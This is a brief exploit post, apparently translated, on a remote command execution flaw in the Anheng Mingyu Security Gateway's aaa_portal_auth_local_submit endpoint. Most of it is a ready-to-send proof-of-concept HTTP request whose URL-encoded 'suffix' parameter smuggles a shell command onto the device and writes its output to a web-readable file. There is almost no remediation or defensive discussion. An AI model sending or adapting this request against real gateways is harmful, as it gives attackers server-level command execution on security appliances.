Anheng Mingyu Security Gateway Aaa_portal_auth_local_submit Remote Command Execution Vulnerability
Anheng Mingyu Security Gateway Aaa_portal_auth_local_submit Remote Command Execution Vulnerability
Anheng Mingyu Security Gateway aaa_portal_auth_local_submit Remote Command Execution Vulnerability
Vulnerability Description
Anheng Mingyu Security Gateway aaa_portal_auth_local_submit There is a remote command execution vulnerability, and an attacker can obtain server permissions through the vulnerability.
Vulnerability Impact
Anheng Mingyu Security Gateway
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%7B%7Burlenc%28%60id%20%3E%2Fusr%2Flocal%2Fwebui%2Ftest.txt%60%29%7D%7D HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
/test.txt
This post is licensed under CC BY 4.0 by the author.